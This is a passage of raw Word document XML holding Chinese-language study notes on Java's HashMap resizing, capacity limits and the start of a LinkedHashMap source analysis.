        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在设置初始容量时应该考虑到映射中所需的条目数及其加载因子，以便最大限度地减少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">rehash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作次数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果初始容量大于最大条目数除以加载因子，则不会发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> rehash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00747E24" w:rsidRDefault="00747E24" w:rsidP="008467A1">
      <w:pPr>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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扩容时是当前容量翻倍即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:capacity*2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B157F" w:rsidRDefault="007B157F" w:rsidP="00EB1111">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ask-title"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>static final int MAXIMUM_CAPACITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ask-title"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>= 1 &lt;&lt; 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B157F" w:rsidRPr="007B157F" w:rsidRDefault="00166923" w:rsidP="008467A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4794885" cy="5899785"/>
            <wp:effectExtent l="19050" t="0" r="5715" b="0"/>
            <wp:docPr id="22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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4794885" cy="5899785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00747E24" w:rsidRDefault="00747E24" w:rsidP="008467A1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E73DB" w:rsidRPr="002E73DB" w:rsidRDefault="00166923" w:rsidP="00EB1111">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>桶容量变为最大值时，紧接着的一次扩容只是简单的将极限值修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Integer.MAX_VALUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。桶数组大小并不会继续加倍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="004B3ECB" w:rsidP="00744EBC">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00744EBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00AE78CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B770DD" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidR="00B0466F" w:rsidRPr="00F41A4C">
        <w:t>源码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大的不同在于，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后者维护者一个运行于所有条目的双向链表。有了这个双向链表，就可以在迭代的时候按照插入的顺序迭代出元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>根据链表中元素的顺序可以分为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>按插入顺序的链表，和按访问顺序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的链表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们知道从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的描述中可以看出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大的不同在于，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后者维护者一个运行于所有条目的双向链表。有了这个双向链表，就可以在迭代的时候按照插入的顺序迭代出元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当然也可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>算法迭代元素，下面会讲到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="29" name="图片 1" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> LinkedHashMap&lt;K, V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> HashMap&lt;K, V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Map&lt;K, V&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们可以看出</w:t>
      </w:r>
